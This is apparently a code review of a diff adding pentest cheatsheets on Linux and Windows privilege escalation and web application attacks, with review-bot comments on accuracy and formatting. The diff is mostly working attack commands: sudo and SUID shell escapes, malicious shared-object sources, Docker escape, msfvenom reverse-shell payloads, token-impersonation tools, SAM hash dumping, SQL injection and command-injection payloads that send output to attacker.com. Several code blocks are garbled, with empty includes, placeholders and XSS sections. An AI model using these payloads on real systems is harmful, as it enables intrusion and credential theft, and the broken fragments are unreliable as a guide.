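Review bot: the "Password Policy Discovery" entry in osint.md (`crackmapexec smb target -u user -p pass --pass-pol`) is authenticated SMB enumeration against the target, not open-source intelligence: it needs valid credentials and touches the target network, which contradicts the passive-reconnaissance workflow the same file lays out. Move it to the Active Directory or network cheatsheet. Smaller points: the `cache:` operator in the Google Dorking table no longer works (Google retired it in 2024), and `dig example.com ANY` is refused or answered minimally by most public resolvers (RFC 8482), so the record-specific `MX`/`TXT` queries beneath it are the ones to rely on.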
@@ -0,0 +1,539 @@ +# Privilege Escalation Cheatsheet + +Quick reference for Linux and Windows privilege escalation techniques. + +--- + +# Linux Privilege Escalation + +## Initial Enumeration + +### System Information +```bash +# Who am I? +whoami +id + +# Hostname and kernel +hostname +uname -a +cat /proc/version +cat /etc/issue + +# Architecture +lscpu + +# Running processes +ps aux +ps aux | grep root +``` + +### User Enumeration +```bash +# Current user privileges +sudo -l + +# List users +cat /etc/passwd +cat /etc/passwd | cut -d: -f1 + +# Password hashes (if readable) +cat /etc/shadow + +# Groups +cat /etc/group + +# Command history +history +cat ~/.bash_history +``` + +### Network Enumeration +```bash +# IP address +ifconfig +ip a + +# Routes +ip route +route -n + +# ARP table +arp -a +ip neigh + +# Open ports +netstat -ano +ss -tulpn + +# Active connections +netstat -antup +``` + +### Password Hunting +```bash +# Search for passwords +grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null +grep --color=auto -rnw '/' -ie "PASS=" 2>/dev/null + +# Find password files +locate password | more +find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null + +# SSH keys +find / -name authorized_keys 2>/dev/null +find / -name id_rsa 2>/dev/null +find / -name id_dsa 2>/dev/null + +# Config files +find / -name "*.conf" 2>/dev/null | xargs grep -l "pass" 2>/dev/null +``` + +--- + +## Automated Tools + +```bash +# LinPEAS +curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh + +# LinEnum +./LinEnum.sh -t + +# linux-exploit-suggester +./linux-exploit-suggester.sh + +# pspy (process monitoring) +./pspy64 +``` + +--- + +## Kernel Exploits + +```bash +# Check kernel version +uname -r +uname -a + +# Search for exploits +searchsploit linux kernel +searchsploit linux kernel 4.4 + +# Common kernel exploits +# Dirty COW (CVE-2016-5195) - Linux < 4.8.3 +# DirtyCred (CVE-2022-2588) +``` + +--- + +## Sudo Abuse + +### Check Sudo Permissions 
+```bash +sudo -l +``` + +### GTFOBins Exploitation +```bash +# vim +sudo vim -c ':!/bin/sh' + +# awk +sudo awk 'BEGIN {system("/bin/bash")}' + +# find +sudo find . -exec /bin/sh \; -quit + +# less/more +sudo less /etc/passwd +!/bin/sh + +# nmap (old versions) +sudo nmap --interactive +!sh + +# python +sudo python -c 'import os; os.system("/bin/sh")' + +# perl +sudo perl -e 'exec "/bin/sh";' + +# ruby +sudo ruby -e 'exec "/bin/sh"' +``` + +### LD_PRELOAD +```bash +# If sudo -l shows: env_keep+=LD_PRELOAD +# Create malicious shared object: + +# shell.c +#include +#include +#include + +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/bash"); +} + +# Compile and execute +gcc -fPIC -shared -o shell.so shell.c -nostartfiles +sudo LD_PRELOAD=/tmp/shell.so +``` + +### Sudo CVEs +```bash +# CVE-2019-14287 (sudo < 1.8.28) +sudo -u#-1 /bin/bash + +# Baron Samedit CVE-2021-3156 (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1) +# Use exploit from GitHub +``` + +--- + +## SUID Binaries + +### Find SUID Binaries +```bash +find / -perm -u=s -type f 2>/dev/null +find / -perm -4000 -type f 2>/dev/null +find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null +``` + +### Exploitation +```bash +# Check GTFOBins for SUID exploitation + +# base64 +./base64 /etc/shadow | base64 -d + +# cp +./cp /etc/passwd /tmp/passwd +# modify and copy back + +# find +./find . 
-exec /bin/sh -p \; -quit + +# vim +./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' +``` + +### Shared Object Injection +```bash +# Find SUID binary dependencies +strace /path/to/suid-binary 2>&1 | grep -i -E "open|access|no such file" + +# If it loads a missing .so file from writable path: +# Create malicious .so + +# libcalc.c +#include +#include + +static void inject() __attribute__((constructor)); + +void inject() { + system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +} + +gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so +``` + +--- + +## Capabilities + +```bash +# Find binaries with capabilities +getcap -r / 2>/dev/null + +# Common exploitable capabilities +# cap_setuid+ep - can change UID + +# Python with cap_setuid +python -c 'import os; os.setuid(0); os.system("/bin/bash")' + +# Perl with cap_setuid +perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' +``` + +--- + +## Cron Jobs + +```bash +# System cron +cat /etc/crontab +ls -la /etc/cron.* + +# User cron +crontab -l + +# Look for: +# - Writable scripts +# - Writable paths in scripts +# - Wildcard injection opportunities + +# Wildcard injection (tar) +# If cron runs: tar czf /tmp/backup.tar.gz * +echo "" > "--checkpoint=1" +echo "" > "--checkpoint-action=exec=sh shell.sh" +``` + +--- + +## NFS Root Squashing + +```bash +# Check NFS exports +cat /etc/exports +showmount -e + +# If no_root_squash is set: +# Mount on attacker machine +mkdir /tmp/nfs +mount -o rw :/share /tmp/nfs + +# Create SUID binary +cp /bin/bash /tmp/nfs/bash +chmod +s /tmp/nfs/bash + +# On target +/share/bash -p +``` + +--- + +## Docker Escape + +```bash +# Check if in docker +cat /proc/1/cgroup | grep docker +ls -la /.dockerenv + +# If user is in docker group +docker run -v /:/mnt --rm -it alpine chroot /mnt sh + +# If docker.sock is accessible +docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh +``` + +--- + +## PATH Hijacking + 
+```bash +# If SUID binary calls commands without full path: +# 1. Create malicious binary +echo '/bin/bash -p' > /tmp/service +chmod +x /tmp/service + +# 2. Prepend PATH +export PATH=/tmp:$PATH + +# 3. Run SUID binary +``` + +--- + +# Windows Privilege Escalation + +## Initial Enumeration + +### System Information +```cmd +systeminfo +hostname +whoami +whoami /priv +whoami /groups +net user +net user +net localgroup +net localgroup administrators +``` + +### Network Enumeration +```cmd +ipconfig /all +route print +arp -a +netstat -ano +``` + +### Process/Service Enumeration +```cmd +tasklist /SVC +sc query +wmic service list brief +``` + +### Find Passwords +```cmd +findstr /si password *.txt *.ini *.config +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +--- + +## Automated Tools + +```powershell +# WinPEAS +.\winPEAS.exe + +# PowerUp +powershell -ep bypass +. .\PowerUp.ps1 +Invoke-AllChecks + +# windows-exploit-suggester +python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt + +# Seatbelt +.\Seatbelt.exe -group=all +``` + +--- + +## Service Exploits + +### Unquoted Service Paths +```cmd +# Find unquoted paths +wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" + +# If path is: C:\Program Files\Some Service\service.exe +# Drop malicious exe at: C:\Program.exe or C:\Program Files\Some.exe +``` + +### Weak Service Permissions +```cmd +# Check service permissions +accesschk.exe /accepteula -uwcqv "Authenticated Users" * +accesschk.exe /accepteula -uwcqv * + +# If SERVICE_CHANGE_CONFIG: +sc config binpath= "C:\temp\shell.exe" +sc stop +sc start +``` + +### DLL Hijacking +```powershell +# Find DLL search order issues +# Use Process Monitor to find missing DLLs + +# Create malicious DLL +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll > evil.dll +``` + +--- + +## Token Impersonation + +### Check Privileges +```cmd +whoami 
/priv +``` + +### SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege +```cmd +# Potato attacks +.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t * + +# PrintSpoofer (Windows 10/Server 2019) +.\PrintSpoofer.exe -i -c cmd + +# GodPotato +.\GodPotato.exe -cmd "cmd /c whoami" +``` + +--- + +## Registry Exploits + +### AlwaysInstallElevated +```cmd +# Check if enabled +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +# If both return 1: +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi > shell.msi +msiexec /quiet /qn /i shell.msi +``` + +### AutoRun +```cmd +# Check autorun locations +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + +# Check if writable +accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program" +``` + +--- + +## Saved Credentials + +```cmd +# List saved credentials +cmdkey /list + +# RunAs with saved creds +runas /savecred /user:admin C:\temp\shell.exe +``` + +--- + +## SAM/SYSTEM Dump + +```cmd +# If you can access: +C:\Windows\System32\config\SAM +C:\Windows\System32\config\SYSTEM + +# Or backup locations: +C:\Windows\Repair\SAM +C:\Windows\Repair\SYSTEM + +# Extract hashes +impacket-secretsdump -sam SAM -system SYSTEM LOCAL +``` + +--- + +## Kernel Exploits + +```cmd +# Check Windows version +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" + +# Common exploits +# MS16-032 (Secondary Logon Handle) +# MS17-010 (EternalBlue) +``` + +--- + +## Resources + +### Linux +- [GTFOBins](https://gtfobins.github.io/) +- [LinPEAS](https://github.com/carlospolop/PEASS-ng) +- [PayloadsAllTheThings - Linux PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) +- [HackTricks - Linux 
PrivEsc](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) + +### Windows +- [LOLBAS](https://lolbas-project.github.io/) +- [WinPEAS](https://github.com/carlospolop/PEASS-ng) +- [PayloadsAllTheThings - Windows PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) +- [HackTricks - Windows PrivEsc](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) diff --git a/infosec/web-application-security.md b/infosec/web-application-security.md new file mode 100644 index 0000000..85c28f7 --- /dev/null +++ b/infosec/web-application-security.md 
@@ -0,0 +1,337 @@ +# Web Application Security Cheatsheet + +Quick reference for web application penetration testing, OWASP vulnerabilities, and common attack techniques. + +## OWASP Top 10 (2021) + +| # | Category | Description | +|---|----------|-------------| +| A01 | Broken Access Control | IDOR, privilege escalation, directory traversal | +| A02 | Cryptographic Failures | Weak encryption, sensitive data exposure | +| A03 | Injection | SQLi, XSS, command injection, LDAP injection | +| A04 | Insecure Design | Missing security controls, flawed architecture | +| A05 | Security Misconfiguration | Default creds, verbose errors, XXE | +| A06 | Vulnerable Components | Outdated libraries, unpatched dependencies | +| A07 | Authentication Failures | Weak passwords, session fixation, brute force | +| A08 | Software/Data Integrity | Insecure deserialization, unsigned updates | +| A09 | Logging Failures | Missing audit trails, no alerting | +| A10 | SSRF | Server-side request forgery | + +--- + +## SQL Injection + +### Detection +``` +# Test characters +' +" +# +-- +; +``` + +### Login Bypass +```sql +' OR 1=1-- +' OR 1=1# +admin'-- +admin'# +' OR '1'='1 +" OR "1"="1 +1' or '1' = '1 +1" or "1" = "1 +``` + +### Union-Based +```sql +' UNION SELECT 1,2,3-- +' UNION SELECT null,null,null-- +' UNION SELECT username,password FROM users-- +``` + +### Blind SQLi (Time-Based) +```sql +' AND SLEEP(5)-- +' WAITFOR DELAY '0:0:5'-- +'; IF (1=1) WAITFOR DELAY '0:0:5'-- +``` + +### SQLMap +```bash +# Basic scan +sqlmap -u "http://target.com/page?id=1" --batch + +# With POST data +sqlmap -u "http://target.com/login" --data "user=admin&pass=test" --batch + +# Enumerate databases +sqlmap -u "http://target.com/page?id=1" --dbs + +# Dump specific table +sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump + +# Common options +--random-agent # Random user agent +--level=5 # Increase test level +--risk=3 # Increase risk level +--threads=10 # Parallel requests +--os-shell # OS shell 
if possible +``` + +--- + +## Cross-Site Scripting (XSS) + +### Types +- **Reflected**: Input immediately returned in response +- **Stored**: Payload saved and executed for other users +- **DOM-based**: Client-side JavaScript processes malicious input + +### Basic Payloads +```html + + + + + +``` + +### WAF Bypass Techniques +```html + + + + + + + + + + + + + + +``` + +### Cookie Stealing +```html + +``` + +--- + +## Server-Side Request Forgery (SSRF) + +### Common Targets +``` +# Localhost +http://127.0.0.1 +http://localhost +http://0.0.0.0 + +# Cloud metadata +http://169.254.169.254/latest/meta-data/ # AWS +http://metadata.google.internal/ # GCP +http://169.254.169.254/metadata/instance # Azure + +# Internal services +http://192.168.0.1 +http://10.0.0.1 +http://172.16.0.1 +``` + +### Bypass Techniques +``` +# Decimal IP +http://2130706433 # 127.0.0.1 + +# Hex IP +http://0x7f000001 # 127.0.0.1 + +# URL encoding +http://127.0.0.1%00@attacker.com + +# DNS rebinding +Use your own DNS server that resolves to internal IP +``` + +--- + +## Directory Traversal / LFI + +### Basic Payloads +``` +../../../etc/passwd +....//....//....//etc/passwd +..%2f..%2f..%2fetc/passwd +%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd +``` + +### Common Targets (Linux) +``` +/etc/passwd +/etc/shadow +/etc/hosts +/proc/self/environ +/var/log/apache2/access.log +~/.ssh/id_rsa +~/.bash_history +``` + +### Common Targets (Windows) +``` +C:\Windows\System32\config\SAM +C:\Windows\repair\SAM +C:\Windows\System32\drivers\etc\hosts +C:\inetpub\logs\LogFiles\ +``` + +### LFI to RCE +``` +# Log poisoning +# 1. Inject PHP into User-Agent +# 2. 
Include log file +/var/log/apache2/access.log + +# PHP wrappers +php://filter/convert.base64-encode/resource=index.php +php://input # POST data as code +data://text/plain, +``` + +--- + +## Command Injection + +### Detection Characters +``` +; +| +|| +& +&& +`command` +$(command) +``` + +### Payloads +```bash +; whoami +| whoami +|| whoami +& whoami +&& whoami +`whoami` +$(whoami) + +# Blind (time-based) +; sleep 5 +| sleep 5 +& ping -c 5 127.0.0.1 + +# Out-of-band +; curl http://attacker.com/$(whoami) +; nslookup $(whoami).attacker.com +``` + +--- + +## Insecure Direct Object Reference (IDOR) + +### Testing Approach +``` +# Change numeric IDs +/api/user/123 → /api/user/124 + +# Change GUIDs (try sequential or predictable) +/api/doc/abc-123 → /api/doc/abc-124 + +# Parameter manipulation +?user_id=1 → ?user_id=2 +?file=report_1.pdf → ?file=report_2.pdf + +# HTTP method tampering +GET /api/admin → POST /api/admin +``` + +--- + +## Authentication Bypass + +### Default Credentials +``` +admin:admin +admin:password +root:root +test:test +guest:guest +``` + +### Brute Force Protection Bypass +``` +# Header manipulation +X-Forwarded-For: 127.0.0.1 +X-Real-IP: 127.0.0.1 +X-Originating-IP: 127.0.0.1 + +# Username enumeration +# Look for timing differences +# Look for response differences +``` + +### JWT Attacks +```bash +# None algorithm +# Change "alg": "HS256" to "alg": "none" + +# Weak secret +hashcat -a 0 -m 16500 jwt.txt wordlist.txt + +# Key confusion (RS256 to HS256) +# Sign with public key as HMAC secret +``` + +--- + +## Burp Suite Quick Reference + +### Keyboard Shortcuts +| Action | Shortcut | +|--------|----------| +| Send to Repeater | Ctrl+R | +| Send to Intruder | Ctrl+I | +| Forward request | Ctrl+F | +| Drop request | Ctrl+D | + +### Intruder Attack Types +- **Sniper**: Single payload position, one at a time +- **Battering ram**: Same payload all positions +- **Pitchfork**: Different payload lists, parallel +- **Cluster bomb**: All combinations + +--- + +## 
Useful Tools + +| Tool | Purpose | +|------|---------| +| Burp Suite | Proxy, scanner, manual testing | +| SQLMap | Automated SQL injection | +| ffuf | Web fuzzing | +| Gobuster | Directory brute forcing | +| Nikto | Web server scanner | +| WPScan | WordPress scanner | +| Nuclei | Template-based scanning | + +--- + +## Resources + +- [PortSwigger Web Security Academy](https://portswigger.net/web-security) +- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/) +- [HackTricks Web](https://book.hacktricks.xyz/) +- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
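Review bot: In the infosec/privilege-escalation.md hunk, the two C sources under LD_PRELOAD (`shell.c`) and Shared Object Injection (`libcalc.c`) have bare `#include` lines with no header names, so the `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` and `gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so` commands fail as written; the same loss of angle-bracket text has emptied the placeholders in `mount -o rw :/share /tmp/nfs`, `msfvenom ... LHOST= LPORT=`, `sc config binpath= "C:\temp\shell.exe"`, `sc stop` and `sc start`. Name the headers, move the C code out of the ```bash fence into its own ```c fence, and use placeholders that survive markdown rendering (for example `TARGET_IP:/share`, `SERVICE_NAME`) so a reader can tell a placeholder from a complete command. Minor: `net user` appears twice under Windows System Information, and `cat /etc/passwd | cut -d: -f1` can be `cut -d: -f1 /etc/passwd`.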
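Review bot: In the infosec/web-application-security.md hunk, the three XSS code blocks (Basic Payloads, WAF Bypass Techniques, Cookie Stealing) are empty fences under their headings, and the LFI to RCE block ends with a dangling `data://text/plain,`; the HTML and PHP tag text appears to have been dropped from the file, so those sections currently document nothing. Either restore the intended content from the source notes or remove the empty headings before merging, since the Resources links already point readers to the full material. Style: the SQL Injection Detection, SSRF, Directory Traversal, IDOR and Authentication Bypass blocks use untagged fences while their neighbours use ```sql and ```bash; tag them consistently (```text where there is no language).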